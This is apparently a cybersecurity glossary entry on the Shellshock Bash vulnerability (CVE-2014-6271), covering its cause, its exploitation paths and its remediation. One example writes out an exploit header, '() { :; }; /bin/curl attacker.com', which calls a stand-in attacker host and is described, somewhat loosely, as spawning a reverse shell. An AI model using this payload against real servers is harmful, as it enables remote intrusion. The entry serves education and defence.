Shellshock (CVE-2014-6271)
What is Shellshock (CVE-2014-6271)?
Shellshock (CVE-2014-6271)A 2014 GNU Bash vulnerability that let attackers run arbitrary commands by setting specially crafted environment variables passed to Bash through other programs.
Shellshock (CVE-2014-6271, plus related CVE-2014-7169) is a flaw in how GNU Bash parsed function definitions stored in environment variables: trailing commands after the function body were executed at shell start. Because many services — CGI scripts, DHCP clients, OpenSSH ForceCommand, qmail — invoked Bash with attacker-controlled environment variables, the bug was trivially remotely exploitable, often as root. The 2014 disclosure triggered a worldwide patch storm and large-scale mass exploitation for botnets, web shells and worms. Remediation requires upgrading Bash to patched versions, replacing legacy Bash-CGI architectures, and applying defense-in-depth like dropping privileges and restricting environment passing.
● Examples
- 01
Sending a User-Agent header like () { :; }; /bin/curl attacker.com to a Bash-CGI endpoint to spawn a reverse shell.
- 02
Exploiting a DHCP client that exports option strings into the environment of a Bash hook script.
● Frequently asked questions
What is Shellshock (CVE-2014-6271)?
A 2014 GNU Bash vulnerability that let attackers run arbitrary commands by setting specially crafted environment variables passed to Bash through other programs. It belongs to the Vulnerabilities category of cybersecurity.
What does Shellshock (CVE-2014-6271) mean?
A 2014 GNU Bash vulnerability that let attackers run arbitrary commands by setting specially crafted environment variables passed to Bash through other programs.
How do you defend against Shellshock (CVE-2014-6271)?
Defences for Shellshock (CVE-2014-6271) typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for Shellshock (CVE-2014-6271)?
Common alternative names include: Bashdoor, CVE-2014-6271.